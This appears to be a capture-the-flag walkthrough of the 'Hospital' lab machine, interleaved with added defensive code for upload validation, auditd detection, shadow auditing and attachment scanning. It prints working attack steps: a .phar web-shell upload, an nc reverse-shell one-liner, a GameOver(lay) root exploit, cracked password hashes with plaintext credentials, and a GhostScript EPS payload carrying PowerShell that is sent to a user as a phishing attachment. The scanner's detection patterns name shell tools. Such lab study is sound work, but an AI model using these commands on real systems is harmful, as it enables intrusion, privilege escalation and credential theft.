Hospital - [File upload to RCE, GhostScript phishing]
Hospital
Nmap Scan
```
# Nmap 7.94 scan initiated Sun Dec 3 01:35:00 2023 as: nmap -sCV -v
PORT     STATE SERVICE           VERSION
22/tcp   open  ssh               OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)
|_  256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: -:35:18Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Issuer: commonName=DC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: -T10:49:03
| Not valid after:  -T10:49:03
| MD5:   04b1:adfe:746a:788e:36c0:802a:bdf3:3119
|_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3
443/tcp  open  ssl/http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-favicon: Unknown favicon MD5: 924A68D347C80D0E502157E83812BB23
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: -T23:48:47
| Not valid after:  -T23:48:47
| MD5:   a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
|_SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Issuer: commonName=DC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: -T10:49:03
| Not valid after:  -T10:49:03
| MD5:   04b1:adfe:746a:788e:36c0:802a:bdf3:3119
|_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3
1801/tcp open  msmq?
2103/tcp open  msrpc             Microsoft Windows RPC
2105/tcp open  msrpc             Microsoft Windows RPC
2107/tcp open  msrpc             Microsoft Windows RPC
2179/tcp open  vmrdp?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Issuer: commonName=DC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: -T10:49:03
| Not valid after:  -T10:49:03
| MD5:   04b1:adfe:746a:788e:36c0:802a:bdf3:3119
|_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3
3269/tcp open  globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Issuer: commonName=DC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: -T10:49:03
| Not valid after:  -T10:49:03
| MD5:   04b1:adfe:746a:788e:36c0:802a:bdf3:3119
|_SHA-1: 17e5:8592:278f:4e8f:8ce1:554c:3550:9c02:2825:91e3
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.hospital.htb
| Issuer: commonName=DC.hospital.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: -T18:39:34
| Not valid after:  -T18:39:34
| MD5:   0c8a:ebc2:3231:590c:2351:ebbf:4e1d:1dbc
|_SHA-1: af10:4fad:1b02:073a:e026:eef4:8917:734b:f8e3:86a7
| rdp-ntlm-info: 
|   Target_Name: HOSPITAL
|   NetBIOS_Domain_Name: HOSPITAL
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: hospital.htb
|   DNS_Computer_Name: DC.hospital.htb
|   DNS_Tree_Name: hospital.htb
|   Product_Version: -
|_  System_Time: -T07:36:12+00:00
8080/tcp open  http              Apache httpd 2.4.55 ((Ubuntu))
|_http-server-header: Apache/2.4.55 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
| smb2-time: 
|   date: -T07:36:11
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
```
Mind Map
From the nmap scan you can tell this is WSL (Windows Subsystem for Linux) running on Windows: the SSH server on port 22 and the web server on port 8080 report Ubuntu builds, while the remaining ports are Windows Active Directory services on the same host.
Service Enumeration
[+] Port 22
Version: OpenSSH 9.0p1 Ubuntu 1ubuntu8.5
Public Exploit: None
Web Enumeration
[+] Port 443 - Webmail Login
There is a login page on port 443, but I don't have credentials for it. I tried default webmail credentials without success.
[+] Port 8080 - Hospital login page
I found another login page, and this one lets me create an account.
After creating an account, I have to upload my medical records in order to get more personalized treatment lol :)
Uploading a .php file gave me an error page.
Trying a different extension, a .phar file was accepted.
I uploaded the p0wny shell with its extension changed to .phar.
To find the upload directory, I used ffuf to brute-force directories and discovered a /uploads directory.
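The upload handler here blocked `.php` but let `.phar` through, which is the classic deny-list failure: PHP has several executable extensions, and on Ubuntu's stock Apache PHP configuration `.phar` is mapped to the same handler as `.php` and `.phtml`. The following is an added example (not code from the box or the writeup) showing the weak deny-list check beside an allow-list check that also verifies content and picks a server-side filename. The extension lists and magic-byte table are assumptions chosen for a medical-records upload.

```python
import os
import secrets

# Extensions the vulnerable handler presumably blocked. Assumption: the writeup only
# reports that .php was rejected and .phar was accepted, so this list is illustrative.
DENY_LIST = {".php", ".php3", ".php4", ".php5", ".phtml"}

# Types a medical-records upload actually needs (assumption for the example).
ALLOW_LIST = {".pdf", ".jpg", ".jpeg", ".png"}

# Leading bytes for each allowed type, so the content must agree with the name.
MAGIC = {
    ".pdf": b"%PDF-",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}


def _ext(filename):
    """Lower-cased final extension of the basename (client path components are dropped)."""
    return os.path.splitext(os.path.basename(filename))[1].lower()


def denylist_accepts(filename):
    """The weak check: anything not explicitly banned gets through, .phar included."""
    return _ext(filename) not in DENY_LIST


def allowlist_accepts(filename, data):
    """The hardened check: exactly one extension, on the allow-list, with matching magic bytes."""
    base = os.path.basename(filename)
    if base.count(".") != 1:  # rejects records.php.pdf style double extensions outright
        return False
    ext = _ext(base)
    if ext not in ALLOW_LIST:
        return False
    return data.startswith(MAGIC[ext])


def storage_name(filename):
    """Server-chosen name: a random token plus the validated extension, so the
    client-supplied basename never reaches the filesystem or a URL."""
    return secrets.token_hex(16) + _ext(filename)


if __name__ == "__main__":
    print("deny-list accepts records.phar:", denylist_accepts("records.phar"))
    print("allow-list accepts records.phar:", allowlist_accepts("records.phar", b"<?php"))
```

Even with the allow-list, the upload directory should sit outside the document root or have script execution switched off for that path (for mod_php, `php_admin_flag engine off` in the directory's Apache config); a guessable `/uploads` directory that executes PHP is what turned a file upload into code execution here.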
Initial Access - Linux machine
Got an interactive shell using the nc mkfifo shell
> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc- >/tmp/f
Post Exploitation - Linux machine
I got a shell as www-data, so I need to escalate privileges to a standard user on the target, which is drwilliams in this case.
Listing the web root directory, I found the config.php file for the hospital page, which contained the password of the MySQL database.
I didn't get anything new from the database.
[+] Privilege Escalation
Checking the kernel version, I noticed that this version of Ubuntu is vulnerable to GameOver(lay).
> unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
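Every step of that one-liner is an ordinary execve that auditd records, so the chain is visible to a defender as a sequence of `unshare` with a user-namespace flag, `setcap cap_setuid` on a copied binary, and an overlayfs mount with `upperdir=`. The following is an added detection example, not part of the writeup: it parses auditd `EXECVE` records (including the hex-encoded arguments auditd emits for values containing spaces) and flags those three patterns. The sample records are constructed to mirror the command above; the timestamps and serials are made up.

```python
import binascii
import re

EXECVE_RE = re.compile(r'^type=EXECVE msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): (?P<rest>.*)$')
# auditd writes a0="..." for plain values and a0=<hex> for values with spaces/quotes.
ARG_RE = re.compile(r'a(?P<idx>\d+)=(?:"(?P<quoted>[^"]*)"|(?P<hex>[0-9A-Fa-f]+))')


def parse_execve(line):
    """Return {'serial': int, 'argv': [...]} for one EXECVE record, or None if it is not one."""
    m = EXECVE_RE.match(line.strip())
    if not m:
        return None
    args = {}
    for am in ARG_RE.finditer(m.group("rest")):
        if am.group("quoted") is not None:
            val = am.group("quoted")
        else:
            val = binascii.unhexlify(am.group("hex")).decode("utf-8", "replace")
        args[int(am.group("idx"))] = val
    return {"serial": int(m.group("serial")), "argv": [args[i] for i in sorted(args)]}


def classify(argv):
    """Labels for the GameOver(lay)-style primitives present in a single argv."""
    if not argv:
        return []
    prog = argv[0].rsplit("/", 1)[-1]
    hits = []
    if prog == "unshare" and any(
        (a.startswith("-") and not a.startswith("--") and ("r" in a or "U" in a))
        or a in ("--map-root-user", "--user")
        for a in argv[1:]
    ):
        hits.append("user namespace created by unshare")
    if prog == "mount" and "overlay" in argv and any("upperdir=" in a for a in argv):
        hits.append("overlayfs mount with upperdir")
    if prog == "setcap" and any("cap_setuid" in a for a in argv):
        hits.append("setcap cap_setuid on a binary")
    return hits


def audit_findings(lines):
    """(serial, label) pairs for every flagged EXECVE record in the input."""
    findings = []
    for line in lines:
        ev = parse_execve(line)
        if ev is None:
            continue
        for hit in classify(ev["argv"]):
            findings.append((ev["serial"], hit))
    return findings


def _hex(s):
    """Encode a value the way auditd does for arguments containing spaces."""
    return s.encode().hex().upper()


# Constructed sample records; two benign commands are included as negatives.
SAMPLE_AUDIT = [
    'type=EXECVE msg=audit(1701589800.101:201): argc=5 a0="unshare" a1="-rm" a2="sh" a3="-c" a4='
    + _hex("mkdir l u w m && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m"),
    'type=EXECVE msg=audit(1701589800.102:202): argc=3 a0="setcap" a1="cap_setuid+eip" a2="l/python3"',
    'type=EXECVE msg=audit(1701589800.103:203): argc=7 a0="mount" a1="-t" a2="overlay" a3="overlay" '
    'a4="-o" a5="rw,lowerdir=l,upperdir=u,workdir=w" a6="m"',
    'type=EXECVE msg=audit(1701589800.200:204): argc=2 a0="ls" a1="-la"',
    'type=EXECVE msg=audit(1701589800.300:205): argc=3 a0="mount" a1="/dev/sdb1" a2="/mnt"',
]

if __name__ == "__main__":
    for serial, label in audit_findings(SAMPLE_AUDIT):
        print(serial, label)
```

In a real deployment you would join each EXECVE record to its paired SYSCALL record (same serial) to get the `auid`, since an overlay mount by root is routine while one by an unprivileged login is not. On Ubuntu the exposure can also be reduced at the source by disabling unprivileged user namespaces (`sysctl kernel.unprivileged_userns_clone=0`), which removes the `unshare -r` step the exploit depends on.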
[+] Hash dumping and cracking
Printing the content of the /etc/shadow file, I got the hash of drwilliams:
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::
Cracking the hash of user `drwilliams` with john:
> john hash -w=/opt/word/rockyou.txt
qwe123!@#
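Two things about that shadow entry are worth reading off before any cracking happens: `$6$` identifies sha512crypt, and `99999` in the max-age field means the password never expires. The cracked value also passes a typical length-plus-three-character-classes policy while sitting in rockyou.txt, which is why wordlist checks matter more than complexity rules. As an added example (not from the writeup), the block below parses shadow(5) lines, reports weak algorithms and no-expiry accounts, and contrasts a complexity check with a wordlist lookup. The `root` and `legacy` lines and the wordlist slice are constructed.

```python
import re

# crypt(3) prefixes as seen in /etc/shadow on current Linux distributions.
HASH_PREFIXES = {
    "$y$": "yescrypt",
    "$7$": "scrypt",
    "$6$": "sha512crypt",
    "$5$": "sha256crypt",
    "$1$": "md5crypt",
}
WEAK_ALGORITHMS = {"md5crypt", "descrypt"}
NO_EXPIRY = 99999  # shadow(5) default for the max-age field: password never expires


def parse_shadow_line(line):
    """Split one shadow(5) entry into a dict; raises ValueError on a malformed line."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"expected 9 colon-separated fields, got {len(fields)}")
    user, pw_hash, last_change, _min_age, max_age, _warn, _inactive, _expire, _ = fields
    if pw_hash in ("", "*", "!", "!!") or pw_hash.startswith("!"):
        algo = "locked"
    elif pw_hash.startswith("$"):
        algo = next((n for p, n in HASH_PREFIXES.items() if pw_hash.startswith(p)), "unknown")
    else:
        algo = "descrypt"  # traditional 13-character DES crypt, no '$' prefix
    return {
        "user": user,
        "algorithm": algo,
        "max_age": int(max_age) if max_age else NO_EXPIRY,
        "last_change": int(last_change) if last_change else None,
    }


def audit_shadow(lines):
    """(user, finding) pairs for unlocked accounts with a weak hash or no password expiry."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        entry = parse_shadow_line(line)
        if entry["algorithm"] == "locked":
            continue
        if entry["algorithm"] in WEAK_ALGORITHMS:
            findings.append((entry["user"], f"weak hash algorithm {entry['algorithm']}"))
        if entry["max_age"] >= NO_EXPIRY:
            findings.append((entry["user"], "password never expires"))
    return findings


def complexity_ok(password, min_len=8):
    """Classic complexity rule: minimum length plus at least three character classes."""
    classes = [r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"]
    return len(password) >= min_len and sum(bool(re.search(c, password)) for c in classes) >= 3


# Constructed slice standing in for a public wordlist such as rockyou.txt.
WORDLIST_SAMPLE = {"123456", "password", "qwerty", "qwe123!@#"}


def in_wordlist(password):
    """True when the candidate appears verbatim in the wordlist sample."""
    return password in WORDLIST_SAMPLE


# Constructed sample: the writeup's drwilliams entry plus two made-up accounts.
SAMPLE_SHADOW = [
    "root:!:19612:0:99999:7:::",
    "drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::",
    "legacy:$1$abcdefgh$0123456789abcdefghijkl:18000:0:90:7:::",
]

if __name__ == "__main__":
    for user, finding in audit_shadow(SAMPLE_SHADOW):
        print(user, finding)
    pw = "qwe123!@#"
    print("complexity ok:", complexity_ok(pw), "in wordlist:", in_wordlist(pw))
```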
Web Mail
Using the credentials obtained for drwilliams, I can access the webmail on port 443.
Viewing the inbox of Dr Williams, I found a mail from Dr Brown.
So Dr Brown is expecting a file from Dr Williams containing the design of a new needle; the file should have the .eps extension and be viewable with GhostScript.
This means that any .eps file we send to Dr Brown will be opened by them.
Looking for possible reverse shells in .eps files, I found a recent command injection exploit affecting GhostScript.
Initial Access
Using this information I crafted a malicious .eps file: leveraging the command injection vulnerability in GhostScript, I injected a PowerShell reverse shell into the .eps file and sent it as an attachment to Dr Brown.
> python3 ghostSPloit.py -g --payload "powershell -e JABjAG...." -x eps
Start a netcat listener, then send the file to Dr Brown.
A couple of seconds later, I got a reverse shell connection on my netcat listener as Dr Brown.
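The mail gateway is the natural place to catch this: an EPS drawing is plain PostScript and has no reason to carry an encoded PowerShell command line or a reference to a shell interpreter. The block below is an added example, not part of the writeup, that parses a raw message with the standard library `email` package, pulls out PostScript attachments (by `.eps`/`.ps` extension or `application/postscript` type) and scans them. The message, addresses and both EPS bodies are constructed; the base64 in the tainted sample decodes to the harmless string `$calc`.

```python
import re
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

POSTSCRIPT_EXTS = (".eps", ".ps")

# Patterns an EPS drawing has no business containing. Assumption: tuned to what the
# writeup describes (an encoded PowerShell command embedded in the file).
SUSPICIOUS = [
    ("encoded PowerShell command",
     re.compile(rb"powershell(?:\.exe)?\b[^\r\n]*?\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", re.I)),
    ("shell interpreter reference",
     re.compile(rb"\b(?:cmd\.exe|/bin/(?:ba)?sh)\b", re.I)),
]


def scan_postscript(data):
    """Findings for one attachment body: bad header and/or suspicious content."""
    findings = []
    if not data.startswith(b"%!PS"):
        findings.append("missing PostScript header")
    for label, pattern in SUSPICIOUS:
        if pattern.search(data):
            findings.append(label)
    return findings


def scan_message(raw):
    """{filename: [findings]} for every PostScript-like attachment in a raw RFC 5322 message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    report = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        is_ps = name.lower().endswith(POSTSCRIPT_EXTS) or part.get_content_type() == "application/postscript"
        if not is_ps:
            continue
        findings = scan_postscript(part.get_payload(decode=True) or b"")
        if findings:
            report[name] = findings
    return report


def build_sample(eps_bytes, filename="needle.eps"):
    """Constructed message in the shape the writeup describes (addresses are made up)."""
    msg = EmailMessage()
    msg["From"] = "drwilliams@hospital.htb"
    msg["To"] = "drbrown@hospital.htb"
    msg["Subject"] = "Needle design"
    msg.set_content("Design attached.")
    msg.add_attachment(eps_bytes, maintype="application", subtype="postscript", filename=filename)
    return msg.as_bytes()


# Constructed: a minimal legitimate EPS drawing, and the same file with an embedded command.
CLEAN_EPS = (b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 100 100\n"
             b"newpath 10 10 moveto 90 90 lineto stroke\nshowpage\n")
TAINTED_EPS = CLEAN_EPS + b"(powershell -e JABjAGEAbABjAA==)\n"  # base64 of UTF-16LE "$calc"

if __name__ == "__main__":
    print("clean:", scan_message(build_sample(CLEAN_EPS)))
    print("tainted:", scan_message(build_sample(TAINTED_EPS)))
```

Signature scanning of this kind is a tripwire, not a fix: the durable control is running GhostScript at a version without the injection bug and rendering untrusted attachments in a sandboxed viewer rather than on the recipient's workstation.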
Post Exploitation
[+] Privilege Escalation
I found credentials for drbrown in the ghostscript.bat file:
chr!$br0wn
Checking the owner of the htdocs folder.
Checking the permissions of the C:\xampp\htdocs folder.
We can upload the same PHP web shell as before to this folder and get an administrative shell from it.